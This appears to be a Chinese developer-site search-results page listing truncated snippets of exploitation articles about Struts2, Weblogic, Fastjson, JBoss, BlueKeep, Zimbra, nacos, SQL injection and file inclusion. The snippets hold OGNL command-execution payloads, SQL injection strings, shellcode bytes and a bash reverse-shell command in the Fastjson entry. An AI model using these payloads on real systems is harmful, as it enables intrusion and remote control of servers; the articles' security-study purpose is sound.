首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    java struts2 漏洞_Struts2漏洞利用「建议收藏」

    Struts漏洞合集 Struts-S2-013漏洞利用 受影响版本 Struts 2.0.0 – Struts 2.3.14.1 漏洞利用 任意命令执行POC: ${(#_memberAccess[“ ()%7D Struts-S2-001漏洞利用 影响版本 Struts2.0.0 – Struts2.3.15 漏洞利用 获取tomcat执行路径: %{“tomcatBinDir{“+@java.lang.System 016漏洞利用 影响版本 2.0.0 – 2.3.15 执行命令 redirect:${#context[“xwork.MethodAccessor.denyMethodExecution”]=false 045漏洞利用 影响版本 Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 POC %{#context[‘com.opensymphony.xwork2 (#ros.flush())} Struts-S2-057漏洞利用 受影响版本 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 POC $%7B233*233%7D

    1.2K50编辑于 2022-09-09
  • 来自专栏FreeBuf

    Ret2dl_resolve漏洞利用分析

    前言 ret2dlresolve是linux下一种利用linux系统延时绑定(Lazy Binding)机制的一种漏洞利用方法,其主要思想是利用dlruntimeresolve()函数写GOT表的操作, 而ret2dlresolve就是修改reloc的偏移,构造fakereloc和fakeElf32Sym,使其指向任意的函数。 漏洞利用方法 现在总结下上述知识和漏洞利用方法。 rinfo的高位是.dynsym中的条目,.dynsym的地址加上0x10*Num,得到函数对应的符号信息,而修改其中的st_name偏移,就可以伪造函数名称,从而实现漏洞利用,我们将其过程反过来,根据漏洞利用顺序 ,实现漏洞利用: 1、在一个地址上写入"system"; 2、伪造reloc,其中rinfo根据.dynsym+0x10*NUM = address of(Elf32Sym ),计算出r_info; 3 ,当然,这里就可以利用ret2dl_resolve进行漏洞利用了。

    1.1K10发布于 2020-05-14
  • 来自专栏Khan安全团队

    Struts2漏洞检查&利用工具-2.0

    Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互 本次更新了vulhub里面的struts2的全漏洞扫描。同时生成linux64位的运行软件。 linux下运行: ? win下运行: ? 由于s2-059poc,没有回显,因此没有添加进去。 (#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). = requests.post(url, data=data2) # print(res2.text) 用法: COMMANDS: help, h Shows a list of commands

    3K20发布于 2021-01-11
  • 来自专栏FreeBuf

    批量S2-045漏洞检测及利用

    前言 S2-045远程代码执行漏洞的CNVD详细信息:http : //www.cnvd.org.cn/flaw/show/CNVD-2017-02474漏洞刚出现时候,Google随便搜索相关URL( filetype:action || ext :action),利用后发现有很多甚至使用ROOT用户启动Tomcat,啧啧啧... 目前,很多公司已经紧锣旗鼓地修复了漏洞,尽管如此,互联网上还是有大批未修复的目标...可能感觉无所谓吧 批量S2-045用python 2.7实现,代码共分三部分,比较糙,多指正。 验证是否有s2-045漏洞 -urlresult文件 - >已存储的抓取的url -detectreslut文件 - >存储验证成功的url 三,远程命令执行 在已发现的具有漏洞的URL基础上,执行远程命令 代码中执行whoami,有的已验证漏洞URL,远程命令执行会捕获异常或返回html页面,猜测目标structs2并未修复,只是在应用层的检测和响应做出防御。

    1.2K50发布于 2018-02-23
  • 来自专栏渗透测试专栏

    渗透测试文件包含漏洞原理与验证(2)——文件包含漏洞利用

    PHP文件包含漏洞分类文件包含漏洞可以分为LFl(Local File Inclusion,本地文件包含)和RFI(Remote File lnclusion,远程文件包含)两种。 /test.php远程文件包含PHP文件包含漏洞利用文件包含漏洞正常访问页面逻辑:1、1.html2、点击标签3、跳转包含文件攻击者思路: http://127.0.0.1/include/03/index.php page=http://操作机ip/shell.txt包含Apache日志文件找到Apache路径,利用包含漏洞包含日志文件获取Webshell。 :/var/lib/php/sess_【PHPSESSID】/tmp/sess_【PHPSESSID】利用条件:其中部分内容可控制访问漏洞页面,在参数中构造payload然后首要任务就是获取session 文件名,可以通过burp抓包查看文件名就是sess_hvjhivr3iptal3909f90rksu9p,利用文件包含漏洞跨目录包含session文件本文部分图片摘自深信服安全服务认证工程师课程课件中,

    1.4K20编辑于 2024-11-12
  • 来自专栏渗透测试专栏

    渗透测试SQL注入漏洞原理与验证(2)——SQL注入漏洞利用

    SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵 SQL注入漏洞原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 1 -- 进行万能密码登录 SELECT username, password FROM users WHERE username='输入值' or 1=1-- ' AND password='输入值2' ' ) ; 双引号( " ) SQL注入分类 按照注入点类型分类 数字型(整型)注入 字符型注入 搜索型注入 数字型(整型)注入 输入的参数为整数,如ID、年龄、页码等,如果存在注入型漏洞 text=value1&cat=value2&num=value3....

    1.5K20编辑于 2024-09-27
  • 来自专栏网络安全攻防

    漏洞利用】最新大华综合漏洞利用工具

    项目介绍 此项目主要用于在授权情况下对大华系列产品进行漏洞检测 漏洞支持 大华综合漏洞利用工具 收录漏洞如下: 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 大华DSS数字监控系统itcBulletin注入漏洞 大华智慧园区综合管理平台信息泄露漏洞 大华智慧园区综合管理平台getNewStaypointDetailQuery 任意文件上传漏洞 大华智慧园区综合管理平台emap任意文件上传漏洞 大华智慧园区综合管理平台searchJson注入漏洞 大华DSS数字监控系统attachment_getAttList.action注入漏洞 大华DSS数字监控系统远程命令执行漏洞 根据程序版本优化,添加新版本的Poc webshell利用模块 大华智慧园区综合管理平台poi任意文件上传漏洞 大华智慧园区综合管理平台video任意文件上传漏洞 ,即可开始检测 cmdshell模块 选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可 webshell利用模块: 内置Godzilla Behinder jspcmdshell

    2.5K10编辑于 2024-06-21
  • 来自专栏全栈程序员必看

    XFF漏洞利用

    作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XFF漏洞 X-Forwarded-For(XFF) 利用方式 1.绕过服务器过滤 2 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP 2.XFF导致sql注入 XFF注入和SQL的header头部注入原理一样,服务器端会对XFF信息进行记录, 但没有进行过滤处理,就容易导致sql注入的产生 X-Forwarded-for: 127.0.0.1 ' and 1=1# 然后进一步利用sql注入,进行渗透测试。

    3.2K10编辑于 2022-07-04
  • 来自专栏FreeBuf

    Metasploitable 2系列教程:漏洞利用之Unreal IRCd 3.2.8.1

    这篇文章中,将会介绍如何利用 Metasploitable 2 上 Unreal IRCd service 存在的漏洞;学习如何对网络服务进行枚举,及如何定义和检索关键信息;分析和使用 msfvenom 在这篇文章中,我们同样将通过,手动结合 metasploit 的方式进行漏洞利用! 我们可以利用该信息,来评估该版本是否为存在漏洞的版本及漏洞利用。 Unreal IRCd 有 3 个可利用漏洞: 1.远程下载和执行 Perl 脚本木马。 2.后门漏洞可在 Metasploit 上利用的 Ruby exploit 。

    2.8K70发布于 2018-02-09
  • 来自专栏FreeBuf

    Nebula漏洞利用包CVE-2016-0189漏洞利用分析

    Nebula EK包中对CVE-2016-0189的漏洞利用,比其它漏洞利用包的漏洞利用方有了一定改进,这里进行一下深入分析。 对了,代码的混淆方法跟落日漏洞利用工具包(Sundown EK)极为相似。 页面中共有2段Javascript代码, 混淆方法相同。 本文试图利用windbg来分析漏洞利用时的内存布局,使得读者对该漏洞利用有更深刻的理解。 2. CVE-2016-0189的关键知识点 CVE-2016-0189是个关于VBScript的漏洞。 CVE-2016-0189 漏洞利用深入分析 Nebula EK的漏洞利用在越界访问的基础上实现了: 1.泄漏VBScript对象的地址 2.读取任意地址 3.写入任意地址(受限) 这3种手段在实现原理上都是类似的 最后我们看一下,整个漏洞利用是如何工作的: 1)首先,创建一个 对象,通过上述的方法(1) 泄露该对象的地址; 2) 在该对象偏移为8的地方,利用方法(2)读取内存获取CSession对象指针; 3)然后在

    1.9K60发布于 2018-02-24
  • 来自专栏全栈工程师修炼之路

    DNS漏洞利用实践

    [TOC] 很多dns探测工具,都会首先尝试dns区域传送,然后才是暴力枚举,那么什么是DNS区域传送漏洞呢? 区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。 使用dig工具可以检测dns 区域传送漏洞,语法如下: dig axfr @域名服务器 被检测域名 示例: root@kali-xuanhun:~# dig @wormhole.movie.edu movie.edu axfr ; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @wormhole.movie.edu movie.edu axfr ; (1 server found) ;; ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 3 “au” “E2U+sip” “!

    1K10编辑于 2022-09-29
  • 来自专栏sktj

    python 漏洞利用脚本

    freefloat-ftp-server/ freefloat-ftp-server.php import socket, sys, time, struct if len(sys.argv) < 2: if len(sys.argv) > 2: platform = sys.argv[2] . xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf" "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25 \x41" "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f" "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\ x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25" "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53

    1.2K10发布于 2019-07-31
  • nacos RCE漏洞利用

    poc检测 FoFa: app="nacos" bp8080监听需要开启 首先我们利用压缩包中的service.py,将它上传到38.12.31.36的机器上,然后在上传到的目标文件夹输入python service.py启动服务 再利用压缩包中的nacos RCE漏洞POC.py 在压缩包目录下输入cmd然后按下回车 在cmd中输入python nacosRCE漏洞POC.py 按下回车会出现一个三角尖 ,在三角处粘贴url路径 按下回车后便会自行开启检测 此poc可以将windows和linux系统都检测到 mstsc远程桌面连接windows 当我们利用漏洞检测工具检测到windows主机时 我们便可以利用压缩包中的

    33210编辑于 2025-07-14
  • 来自专栏知道创宇

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 信道的定义字段主要是名字加上配置,配置主要包括了优先级等 在server 目的是将访问从服务器重定向到客户端文件系统,其数据头部将会主要是两种标识和PacketId字段组成: 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 在完全建立连接后,将会创建 IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: 可是在windowsxp中,直接发送 发送了1044个数据包去申请0x170大小的池内存,这样做可以说应该是为了防止之后被free掉的内存被其他程序占用了,提高free后内存被我们占用的生存几率 占位被free的实际数据大小为0x128,利用的中转地址是 80%9CBig%20Kids%E2%80%99%20Pool%E2%80%9D%E4%B8%AD%E7%9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html

    89220发布于 2019-09-20
  • 来自专栏WhITECat安全团队

    zimbra RCE 漏洞利用

    前言 近期在测试一个目标的时候发现对方好几个zimbra的服务器,按照网上提供的利用方法测试了之后发现利用不成功!接着自己搭建了zimbra在自己进行测试之后成功利用并且拿下zimbra服务器! wget http://th.archive.ubuntu.com/ubuntu/pool/universe/g/gmp4/libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb dpkg -i libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb ? 接着利用刚刚获取到的高权限的TOKEN 来进行文件上传,把webshell上传上去! 首先获取它的数据包,利用了CVE-2019-9670 XXE漏洞来读取配置文件。Zimbra配置文件位置为/conf/localconfig.xml。

    5.2K10发布于 2020-11-25
  • 来自专栏黑白天安全团队

    Weblogic漏洞利用总结

    成功反弹 CVE-2019-2618 漏洞简述 利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台 该漏洞有两个利用手法 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 DNSLOG的使用 DNSLOG可以在某些无法直接利用漏洞获得回显的情况下, 但是目标可以发起DNS 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10版本并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类 2.利用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext ssrf漏洞 漏洞描述 Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

    5.2K20发布于 2021-03-16
  • 来自专栏Bypass

    Fastjson 漏洞利用技巧

    每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。 如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。 Github项目地址: https://github.com/pmiaowu/BurpFastJsonScan 02、简化攻击步骤 在这里我们可以使用一款JNDI服务利用工具,来简化fastjson 漏洞检测的步骤,辅助漏洞利用和渗透。 Github项目地址: https://github.com/wyzxxz/jndi_tool Fstjson漏洞利用: (1)开启RMI服务 java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1" (2)设置监听服务器 nc -lvvp 12345 (3)构造请求发送payload

    1.6K20编辑于 2022-06-24
  • 来自专栏Seebug漏洞平台

    BlueKeep 漏洞利用分析

    IcaCreateChannel开始创建大小为0x8c的信道结构体之后将会与虚拟通道id是0x1f绑定,也就是这个结构体将会被我们利用 ? 在这里我们刚好利用到了rdpde客户端name响应的数据来进行池内存的占位 ? 在完全建立连接后,将会创建rdpdr信道的结构体 ? IcaChannelInputInternal中的ExAllocatePoolWithTag分配非分页池内存,并且其长度是我们可以控制的,基本满足了UAF利用的需求: ? 占位被free的实际数据大小为0x128,利用的中转地址是0xfffffa80ec000948 ? 80%9CBig%20Kids%E2%80%99%20Pool%E2%80%9D%E4%B8%AD%E7%9A%84%E5%A0%86%E5%96%B7%E6%8A%80%E6%9C%AF.html

    76430发布于 2019-09-20
  • 来自专栏全栈程序员必看

    ewebeditor漏洞利用总结

    (sUploadDir) Case “2” sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)) End 4、说说漏洞基本利用步骤,还以asp为例! 登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。. 先贴漏洞利用方式! 这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法! 漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..

    1.8K20编辑于 2022-09-14
  • 来自专栏黑白天安全团队

    Jboss漏洞利用总结

    在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。 漏洞汇总 ? CVE-2007-1036漏洞相同,唯一的区别是CVE-2006-5750漏洞利用methodIndex进行store()方法的调用。 若访问200,则可能存在漏洞。 ? 此处我们使用JavaDeserH2HC工具来利用漏洞,尝试直接弹回一个shell javac -cp . 漏洞利用 首先从http响应头和title中一般情况下都能看到信息来确定目标 jboss 版本是否在此漏洞版本范围 ? 现成工具 ? 接下来借助JavaDeserH2HC来完成整个利用过程 首先尝试直接反弹shell,利用JavaDeserH2HC创建好用于反弹shell的 payload,如下 javac -cp .

    7K30发布于 2020-08-04
领券